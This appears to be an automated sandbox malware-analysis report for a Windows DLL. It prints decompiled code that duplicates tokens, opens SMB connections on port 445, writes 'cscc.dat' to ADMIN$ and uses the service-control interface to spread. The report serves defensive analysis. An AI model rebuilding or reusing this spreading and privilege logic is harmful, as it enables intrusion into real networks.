                                                                                                                                                                                        				void _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                        				_Unknown_base(*)()* _t57;
                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t75;
                                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t84;
                                                                                                                                                                                        				void** _t86;
                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v24 =  *0x7c7bb8;
                                                                                                                                                                                        				_t46 =  !( *0x7c7bc0 >> 2) & 0x00000001;
                                                                                                                                                                                        				_v20 = _t46;
                                                                                                                                                                                        				if(_t46 != 0) {
                                                                                                                                                                                        					_push(0); // executed
                                                                                                                                                                                        					E007BA016(); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v52 = _v52 & 0x00000000;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                                                        				if(_t82 == 0) {
                                                                                                                                                                                        					L27:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					 *_t82 = _v20;
                                                                                                                                                                                        					_t53 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                                                        					 *(_t82 + 4) = _t53;
                                                                                                                                                                                        					_t95 = _t53;
                                                                                                                                                                                        					if(_t53 == 0) {
                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t54 = E007B6B0E(_v24, _t95, _t53);
                                                                                                                                                                                        					_t75 = 0;
                                                                                                                                                                                        					_v28 = _t54;
                                                                                                                                                                                        					if(_t54 == 0) {
                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_v12 = _t75;
                                                                                                                                                                                        						if(_v8 == 6) {
                                                                                                                                                                                        							goto L10;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t65 = CreateThread(_t75, _t75, E007BA112, _t82, _t75, _t75); // executed
                                                                                                                                                                                        						if(_t65 == 0) {
                                                                                                                                                                                        							L26:
                                                                                                                                                                                        							E007B6B46(_v28);
                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *(_t92 + _v8 * 4 - 0x30) = _t65;
                                                                                                                                                                                        						_t75 = 0;
                                                                                                                                                                                        						L11:
                                                                                                                                                                                        						_t55 = 0;
                                                                                                                                                                                        						while( *((intOrPtr*)(_t92 + _t55 * 4 - 0x30)) != _t75) {
                                                                                                                                                                                        							_v12 =  &(_v12->nLength);
                                                                                                                                                                                        							_t55 = _t55 + 1;
                                                                                                                                                                                        							if(_t55 != 6) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t57 = GetProcAddress(GetModuleHandleA("kernel32"), "WaitForMultipleObjects");
                                                                                                                                                                                        						_t84 = _v12;
                                                                                                                                                                                        						_t58 =  *_t57(_t84,  &_v52, 0, _v16);
                                                                                                                                                                                        						if(_t58 == 0xffffffff) {
                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t58 != 0x102) {
                                                                                                                                                                                        							__eflags = _t58 - _t84 - 1;
                                                                                                                                                                                        							if(_t58 <= _t84 - 1) {
                                                                                                                                                                                        								_t86 = _t92 + _t58 * 4 - 0x30;
                                                                                                                                                                                        								_v8 = _t58;
                                                                                                                                                                                        								CloseHandle( *_t86);
                                                                                                                                                                                        								 *_t86 =  *_t86 & 0x00000000;
                                                                                                                                                                                        								__eflags =  *_t86;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L23:
                                                                                                                                                                                        							_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                                                        							if(_t82 == 0) {
                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                                                        							_t77 = _v20;
                                                                                                                                                                                        							 *(_t82 + 4) = _t63;
                                                                                                                                                                                        							 *_t82 = _v20;
                                                                                                                                                                                        							if(_t63 == 0 || E007B6AD0(_t77, _t63) == 0) {
                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t75 = 0;
                                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t78 = 6;
                                                                                                                                                                                        						_v8 = _t78;
                                                                                                                                                                                        						_t67 = 0;
                                                                                                                                                                                        						while( *((intOrPtr*)(_t92 + _t67 * 4 - 0x30)) != 0) {
                                                                                                                                                                                        							_t67 = _t67 + 1;
                                                                                                                                                                                        							if(_t67 != _t78) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v8 = _t67;
                                                                                                                                                                                        						goto L23;
                                                                                                                                                                                        						L10:
                                                                                                                                                                                        						_t18 =  &_v16;
                                                                                                                                                                                        						 *_t18 = _v16 | 0xffffffff;
                                                                                                                                                                                        						__eflags =  *_t18;
                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}



























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007BA1EB
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007BA1F4
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000021), ref: 007BA209
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007BA20C
                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 007BA258
                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 007BA290
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007BA297
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007BA2E1
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007BA2EE
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007BA2F1
                                                                                                                                                                                          • Part of subcall function 007BA016: GetCurrentThread.KERNEL32 ref: 007BA035
                                                                                                                                                                                          • Part of subcall function 007BA016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007BA1D0,00000000), ref: 007BA03C
                                                                                                                                                                                          • Part of subcall function 007BA016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 007BA059
                                                                                                                                                                                          • Part of subcall function 007BA016: CloseHandle.KERNEL32(?,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA0F5
                                                                                                                                                                                          • Part of subcall function 007BA016: CloseHandle.KERNEL32(0000FFFF,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA105
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000021), ref: 007BA2FD
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007BA300
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                                                                                                                                        • String ID: Oet Uet0Xet$WaitForMultipleObjects$kernel32
                                                                                                                                                                                        • API String ID: 2880803415-1973291610
                                                                                                                                                                                        • Opcode ID: b1188b9a5cfebe86943a2b4629f316e48f6166dd64f6c7c585088265b6a2885f
                                                                                                                                                                                        • Instruction ID: c0f7746f1add836e65eb32e4fb27f4c3a7f777a71f0240fab472cf42b3ebbb27
                                                                                                                                                                                        • Opcode Fuzzy Hash: b1188b9a5cfebe86943a2b4629f316e48f6166dd64f6c7c585088265b6a2885f
                                                                                                                                                                                        • Instruction Fuzzy Hash: B0414F71D1021ABBDF14AFA8DC49BEEB7B4FB48310F208529E511E7290EB789D408B55
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 458 7b1ca3-7b1ccd GetProcessHeap HeapAlloc 459 7b1cd3-7b1ce0 GetProcessHeap HeapAlloc 458->459 460 7b1dc7-7b1dce 458->460 461 7b1ce6-7b1d2e htons send 459->461 462 7b1db5-7b1dc0 459->462 463 7b1d30-7b1d45 recv 461->463 464 7b1da5-7b1dae 461->464 462->460 463->464 465 7b1d47-7b1d4a 463->465 464->462 465->464 467 7b1d4c-7b1d60 call 7b1c3a 465->467 467->464 471 7b1d62-7b1d66 467->471 472 7b1d6b 471->472 473 7b1d6d-7b1d81 call 7b1747 472->473 475 7b1d86-7b1d8b 473->475 475->464 476 7b1d8d-7b1d96 475->476 476->473 477 7b1d98-7b1da3 476->477 477->464 477->472
                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                        			E007B1CA3(intOrPtr _a4, void** _a8, long _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				short _t42;
                                                                                                                                                                                        				char _t45;
                                                                                                                                                                                        				char _t46;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                        				intOrPtr* _t56;
                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t34 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v16 = _t34;
                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                        					_t47 = HeapAlloc(GetProcessHeap(), 8, 0x33);
                                                                                                                                                                                        					if(_t47 != 0) {
                                                                                                                                                                                        						_t58 =  *_a8;
                                                                                                                                                                                        						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) + 1;
                                                                                                                                                                                        						_t48 = 9;
                                                                                                                                                                                        						_t41 = memcpy(_t47, _t58, _t48 << 2);
                                                                                                                                                                                        						__imp__#9(0x2f);
                                                                                                                                                                                        						 *(_t47 + 2) = _t41;
                                                                                                                                                                                        						_t42 = 0xc;
                                                                                                                                                                                        						 *((char*)(_t47 + 8)) = 0x72;
                                                                                                                                                                                        						 *((short*)(_t47 + 0x25)) = _t42;
                                                                                                                                                                                        						 *((char*)(_t47 + 0x27)) = 2;
                                                                                                                                                                                        						asm("movsd");
                                                                                                                                                                                        						asm("movsd");
                                                                                                                                                                                        						asm("movsw");
                                                                                                                                                                                        						asm("movsb");
                                                                                                                                                                                        						__imp__#19(_a4, _t47, 0x33, 0); // executed
                                                                                                                                                                                        						if(_t42 > 0) {
                                                                                                                                                                                        							_t60 = _v16;
                                                                                                                                                                                        							__imp__#16(_a4, _t60, 0xffff, 0); // executed
                                                                                                                                                                                        							if(_t42 > 0) {
                                                                                                                                                                                        								_t68 =  *((intOrPtr*)(_t60 + 9));
                                                                                                                                                                                        								if( *((intOrPtr*)(_t60 + 9)) == 0) {
                                                                                                                                                                                        									_t45 = E007B1C3A(0, _t68, _a4, _a8, _a12, _t60);
                                                                                                                                                                                        									_v5 = _t45;
                                                                                                                                                                                        									if(_t45 == 0) {
                                                                                                                                                                                        										_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        										_t56 = 0x7c3478;
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											_t61 = 0;
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												_t23 = _t61 + 0x7c34f0; // 0x7c0494
                                                                                                                                                                                        												_t46 = E007B1747(_a4, _a8, _a12,  *_t56,  *_t23, _v16); // executed
                                                                                                                                                                                        												_v5 = _t46;
                                                                                                                                                                                        												if(_t46 != 0) {
                                                                                                                                                                                        													goto L11;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t61 = _t61 + 4;
                                                                                                                                                                                        												if(_t61 < 0xcc) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													goto L10;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L11;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                        											L10:
                                                                                                                                                                                        											_v12 = _v12 + 4;
                                                                                                                                                                                        											_t56 = _t56 + 4;
                                                                                                                                                                                        										} while (_v12 < 0x78);
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L11:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t47);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RtlFreeHeap(GetProcessHeap(), 8, _v16); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,007B5414,00000000,?,0BADF00D,?,?,?,?,007B943A,?), ref: 007B1CBD
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1CC6
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,007B943A,?), ref: 007B1CD7
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1CDA
                                                                                                                                                                                        • htons.WS2_32(0000002F), ref: 007B1CF7
                                                                                                                                                                                        • send.WS2_32(00000033,00000000,00000033,00000000), ref: 007B1D26
                                                                                                                                                                                        • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B1D3D
                                                                                                                                                                                          • Part of subcall function 007B1747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,007B1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 007B1783
                                                                                                                                                                                          • Part of subcall function 007B1747: HeapAlloc.KERNEL32(00000000), ref: 007B178C
                                                                                                                                                                                          • Part of subcall function 007B1747: CharUpperW.USER32(00000000), ref: 007B17B2
                                                                                                                                                                                          • Part of subcall function 007B1747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 007B17DA
                                                                                                                                                                                          • Part of subcall function 007B1747: HeapAlloc.KERNEL32(00000000), ref: 007B17DD
                                                                                                                                                                                          • Part of subcall function 007B1747: htons.WS2_32(00000082), ref: 007B1801
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A,?), ref: 007B1DA8
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1DAF
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A,?), ref: 007B1DBA
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,?,?,007B943A,?), ref: 007B1DC1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Freehtons$CharUpperrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet$NT LM 0.12$l|$x
                                                                                                                                                                                        • API String ID: 2343870972-3302060157
                                                                                                                                                                                        • Opcode ID: 13856267a4073938ddb87a167b078ed0b87b521d2fbb02e5d1ec3543242f0373
                                                                                                                                                                                        • Instruction ID: 63b9d70407d44df704d16163e1dd6d07b56b8aa69358414545731394d9b45ce2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 13856267a4073938ddb87a167b078ed0b87b521d2fbb02e5d1ec3543242f0373
                                                                                                                                                                                        • Instruction Fuzzy Hash: E631F332A00245FBEF228FE4CC49F9E7F75BF45310F448069FA08AB152D6798905CB50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 478 7b5337-7b535f HeapAlloc 480 7b54fd-7b5504 478->480 481 7b5365-7b538f rand 478->481 482 7b5398-7b53bf rand socket 481->482 483 7b5391-7b5397 481->483 484 7b54ed-7b54f6 482->484 485 7b53c5-7b5400 htons inet_addr connect 482->485 483->482 484->480 486 7b54df 485->486 487 7b5406-7b5416 call 7b1ca3 485->487 488 7b54e6-7b54e7 closesocket 486->488 492 7b54dc 487->492 493 7b541c-7b5432 call 7b2191 487->493 488->484 492->486 496 7b5438-7b5457 call 7b46c7 call 7b21dc 493->496 497 7b54c6 493->497 504 7b545c-7b5460 496->504 499 7b54cd-7b54d2 call 7b1dd1 497->499 503 7b54d7-7b54da 499->503 503->488 504->499 505 7b5462-7b547c call 7b1eb9 504->505 505->499 508 7b547e-7b5492 call 7b2054 505->508 508->499 511 7b5494-7b54aa call 7b4ab5 508->511 511->499 514 7b54ac-7b54be call 7b516b 511->514 514->499 517 7b54c0-7b54c4 514->517 517->499
                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E007B5337(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                        				short _v38;
                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                        				int _t56;
                                                                                                                                                                                        				short _t60;
                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                        				int _t84;
                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t85 = __ecx;
                                                                                                                                                                                        				_v20 = 0xbadf00d;
                                                                                                                                                                                        				_t89 = HeapAlloc(GetProcessHeap(), 8, 0x24);
                                                                                                                                                                                        				_v16 = _t89;
                                                                                                                                                                                        				if(_t89 == 0) {
                                                                                                                                                                                        					L19:
                                                                                                                                                                                        					return _v20;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *((intOrPtr*)(_t89 + 4)) = 0x424d53fe;
                                                                                                                                                                                        				 *((char*)(_t89 + 0xd)) = 0x18;
                                                                                                                                                                                        				 *((short*)(_t89 + 0xe)) = 0x4801;
                                                                                                                                                                                        				 *((short*)(_t89 + 0x1e)) = 0xfeff;
                                                                                                                                                                                        				_t54 = rand() & 0x80001fff;
                                                                                                                                                                                        				if(_t54 < 0) {
                                                                                                                                                                                        					_t54 = (_t54 - 0x00000001 | 0xffffe000) + 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *((short*)(_t89 + 0x22)) = _t54 + 0x1000;
                                                                                                                                                                                        				 *((intOrPtr*)(_t89 + 9)) = 0x300;
                                                                                                                                                                                        				_t56 = rand();
                                                                                                                                                                                        				 *(_t89 + 0x10) = _t56;
                                                                                                                                                                                        				__imp__#23(2, 1, 6); // executed
                                                                                                                                                                                        				_t84 = _t56;
                                                                                                                                                                                        				if(_t84 == 0xffffffff) {
                                                                                                                                                                                        					L18:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t89);
                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t60 = 2;
                                                                                                                                                                                        				_v40 = _t60;
                                                                                                                                                                                        				__imp__#9(0x1bd);
                                                                                                                                                                                        				_v38 = _t60;
                                                                                                                                                                                        				__imp__#11(_a4);
                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                        				_t61 =  &_v40;
                                                                                                                                                                                        				__imp__#4(_t84, _t61, 0x10); // executed
                                                                                                                                                                                        				if(_t61 == 0xffffffff) {
                                                                                                                                                                                        					L16:
                                                                                                                                                                                        					_v20 = 0xc0c0c0c;
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        					__imp__#3(_t84); // executed
                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t64 = E007B1CA3(_t84,  &_v16,  &_v20); // executed
                                                                                                                                                                                        				if(_t64 == 0) {
                                                                                                                                                                                        					_t89 = _v16;
                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        				_t88 =  &_v16;
                                                                                                                                                                                        				_t66 = E007B2191( &_v16, _t84, _a4,  &_v24); // executed
                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                        					_v20 = 0xc0c0c0c;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t90 = _v16;
                                                                                                                                                                                        					_t70 = E007B46C7(_t85, _t84, _a4, _v16,  &_v24, _v20); // executed
                                                                                                                                                                                        					_v20 = _t70;
                                                                                                                                                                                        					E007B21DC(_t84, _t88,  &_v24); // executed
                                                                                                                                                                                        					if(_v20 == 0) {
                                                                                                                                                                                        						_v20 = 0xf0f0f0f;
                                                                                                                                                                                        						if(E007B1EB9(_t84, _t88, _a4, "ADMIN$") != 0 && E007B2054(_t84, _t90,  &_v12, "cscc.dat", 1) == 0 && E007B4AB5(_a20, _t85, _t84, _t90,  &_v24, _a12, _a16) != 0 && E007B516B(_t85, _t84, _t90, _a4, _a8, _a12) != 0) {
                                                                                                                                                                                        							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E007B1DD1(_t85, _t84,  &_v16); // executed
                                                                                                                                                                                        				_t89 = _v16;
                                                                                                                                                                                        				goto L17;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74656840,00000000,?,?,?,?,007B943A,?), ref: 007B534B
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B5352
                                                                                                                                                                                        • rand.MSVCRT ref: 007B5388
                                                                                                                                                                                        • rand.MSVCRT ref: 007B53A8
                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 007B53B4
                                                                                                                                                                                        • htons.WS2_32(000001BD), ref: 007B53DA
                                                                                                                                                                                        • inet_addr.WS2_32(?), ref: 007B53E7
                                                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 007B53F7
                                                                                                                                                                                          • Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 007B51D3
                                                                                                                                                                                          • Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000), ref: 007B51DC
                                                                                                                                                                                          • Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 007B5205
                                                                                                                                                                                          • Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000), ref: 007B5208
                                                                                                                                                                                          • Part of subcall function 007B516B: rand.MSVCRT ref: 007B521B
                                                                                                                                                                                          • Part of subcall function 007B516B: rand.MSVCRT ref: 007B5226
                                                                                                                                                                                          • Part of subcall function 007B516B: rand.MSVCRT ref: 007B522F
                                                                                                                                                                                          • Part of subcall function 007B516B: sprintf.MSVCRT ref: 007B5246
                                                                                                                                                                                          • Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5252
                                                                                                                                                                                          • Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5255
                                                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007B54E7
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A,?), ref: 007B54F0
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B54F7
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                                                                                                                                        • String ID: Oet Uet0Xet$ADMIN$$cscc.dat
                                                                                                                                                                                        • API String ID: 228017060-2485865258
                                                                                                                                                                                        • Opcode ID: 3d2fc52da86ca60cd0f73340177c8efb81a78e3a28ceae8f519e1fa2bd2f90c8
                                                                                                                                                                                        • Instruction ID: 44f888d2e4a9a9735e0ea965a5ad4ca749274a5af3059275ac16f9f1bd742f49
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d2fc52da86ca60cd0f73340177c8efb81a78e3a28ceae8f519e1fa2bd2f90c8
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0516C71900349BADB209FA4CC49FEF7BB8FF08355F008904F915A7292D3789944CB60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                        			E007B733C(intOrPtr _a4) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				struct HINSTANCE__* _v20;
                                                                                                                                                                                        				short _v84;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				struct HINSTANCE__* _t20;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                        				signed char* _t47;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        
